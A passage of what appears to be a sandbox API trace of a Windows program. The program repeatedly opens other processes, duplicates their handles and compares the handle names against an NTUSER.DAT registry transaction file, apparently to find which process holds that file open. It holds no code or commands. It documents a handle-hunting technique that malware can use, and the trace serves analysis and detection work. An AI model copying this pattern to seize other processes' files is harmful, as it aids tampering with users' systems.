out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.716] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.717] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.717] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.717] CloseHandle (hObject=0x670) returned 1 [0153.717] CloseHandle (hObject=0x680) returned 1 [0153.717] CloseHandle (hObject=0x62c) returned 1 [0153.717] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.717] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.718] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.719] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.719] CloseHandle (hObject=0x670) returned 1 [0153.719] _wcsicmp (_Str1="\\sysmain.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.719] CloseHandle (hObject=0x680) returned 1 [0153.719] CloseHandle (hObject=0x62c) returned 1 [0153.719] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0153.719] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x700, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.720] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.720] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.720] CloseHandle (hObject=0x670) returned 1 [0153.720] CloseHandle (hObject=0x680) returned 1 [0153.720] CloseHandle (hObject=0x62c) returned 1 [0153.720] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.720] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.721] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.722] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.722] CloseHandle (hObject=0x670) returned 1 [0153.722] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.722] CloseHandle (hObject=0x680) returned 1 [0153.722] CloseHandle (hObject=0x62c) returned 1 [0153.722] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.722] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.723] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.723] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.723] CloseHandle (hObject=0x670) returned 1 [0153.723] CloseHandle (hObject=0x680) returned 1 [0153.723] CloseHandle (hObject=0x62c) returned 1 [0153.724] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.724] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.724] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.725] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.725] CloseHandle (hObject=0x670) returned 1 [0153.725] CloseHandle (hObject=0x680) returned 1 [0153.725] CloseHandle (hObject=0x62c) returned 1 [0153.725] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.725] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.726] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.726] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.726] CloseHandle (hObject=0x670) returned 1 [0153.726] CloseHandle (hObject=0x680) returned 1 [0153.726] CloseHandle (hObject=0x62c) returned 1 [0153.727] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.727] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.727] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.728] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.728] CloseHandle (hObject=0x670) returned 1 [0153.728] _wcsicmp (_Str1="\\tmp.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.728] CloseHandle (hObject=0x680) returned 1 [0153.728] CloseHandle (hObject=0x62c) returned 1 [0153.728] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.728] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.728] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.729] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.729] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.729] CloseHandle (hObject=0x670) returned 1 [0153.729] _wcsicmp (_Str1="\\SCHEDLGU.TXT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.729] CloseHandle (hObject=0x680) returned 1 [0153.729] CloseHandle (hObject=0x62c) returned 1 [0153.729] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.730] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x498, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.730] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.730] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.731] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.731] CloseHandle (hObject=0x670) returned 1 [0153.731] CloseHandle (hObject=0x680) returned 1 [0153.731] CloseHandle (hObject=0x62c) returned 1 [0153.731] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.731] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.732] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.732] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.733] CloseHandle (hObject=0x670) returned 1 [0153.733] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.733] CloseHandle (hObject=0x680) returned 1 [0153.733] CloseHandle (hObject=0x62c) returned 1 [0153.733] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.733] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.733] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.734] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.734] CloseHandle (hObject=0x670) returned 1 [0153.734] _wcsicmp (_Str1="\\Tasks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.734] CloseHandle (hObject=0x680) returned 1 [0153.734] CloseHandle (hObject=0x62c) returned 1 [0153.734] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.734] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.735] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.736] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.736] CloseHandle (hObject=0x670) returned 1 [0153.736] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.736] CloseHandle (hObject=0x680) returned 1 [0153.736] CloseHandle (hObject=0x62c) returned 1 [0153.736] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.736] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.737] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.737] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.738] CloseHandle (hObject=0x670) returned 1 [0153.738] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.738] CloseHandle (hObject=0x680) returned 1 [0153.738] CloseHandle (hObject=0x62c) returned 1 [0153.738] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.738] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.738] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.739] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.739] CloseHandle (hObject=0x670) returned 1 [0153.739] CloseHandle (hObject=0x680) returned 1 [0153.739] CloseHandle (hObject=0x62c) returned 1 [0153.739] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.739] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.740] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.740] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.740] CloseHandle (hObject=0x670) returned 1 [0153.741] CloseHandle (hObject=0x680) returned 1 [0153.741] CloseHandle (hObject=0x62c) returned 1 [0153.741] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.741] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.741] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.742] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.742] CloseHandle (hObject=0x670) returned 1 [0153.742] _wcsicmp (_Str1="\\CatalogChangeListener-370-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.742] CloseHandle (hObject=0x680) returned 1 [0153.742] CloseHandle (hObject=0x62c) returned 1 [0153.742] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.742] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.743] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.744] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.744] CloseHandle (hObject=0x670) returned 1 [0153.744] CloseHandle (hObject=0x680) returned 1 [0153.744] CloseHandle (hObject=0x62c) returned 1 [0153.744] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.744] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.745] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.745] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.745] CloseHandle (hObject=0x670) returned 1 [0153.745] CloseHandle (hObject=0x680) returned 1 [0153.745] CloseHandle (hObject=0x62c) returned 1 [0153.745] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.745] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x520, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.746] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.746] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.747] CloseHandle (hObject=0x670) returned 1 [0153.747] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.747] CloseHandle (hObject=0x680) returned 1 [0153.747] CloseHandle (hObject=0x62c) returned 1 [0153.747] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.747] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.747] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.748] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.748] CloseHandle (hObject=0x670) returned 1 [0153.748] _wcsicmp (_Str1="\\MOF", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.748] CloseHandle (hObject=0x680) returned 1 [0153.748] CloseHandle (hObject=0x62c) returned 1 [0153.748] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.748] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x68c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.749] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.749] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.750] CloseHandle (hObject=0x670) returned 1 [0153.750] CloseHandle (hObject=0x680) returned 1 [0153.750] CloseHandle (hObject=0x62c) returned 1 [0153.750] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.750] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x788, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.750] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.751] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.751] CloseHandle (hObject=0x670) returned 1 [0153.751] CloseHandle (hObject=0x680) returned 1 [0153.751] CloseHandle (hObject=0x62c) returned 1 [0153.751] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.751] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.752] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.753] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.753] CloseHandle (hObject=0x670) returned 1 [0153.753] CloseHandle (hObject=0x680) returned 1 [0153.753] CloseHandle (hObject=0x62c) returned 1 [0153.753] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.753] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.754] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.754] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.754] CloseHandle (hObject=0x670) returned 1 [0153.754] CloseHandle (hObject=0x680) returned 1 [0153.754] CloseHandle (hObject=0x62c) returned 1 [0153.754] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.755] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.755] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.756] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.756] CloseHandle (hObject=0x670) returned 1 [0153.756] CloseHandle (hObject=0x680) returned 1 [0153.756] CloseHandle (hObject=0x62c) returned 1 [0153.756] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.756] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.756] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.757] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.757] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.757] CloseHandle (hObject=0x670) returned 1 [0153.757] CloseHandle (hObject=0x680) returned 1 [0153.757] CloseHandle (hObject=0x62c) returned 1 [0153.758] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.758] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x8fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.758] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.759] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.759] CloseHandle (hObject=0x670) returned 1 [0153.759] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") 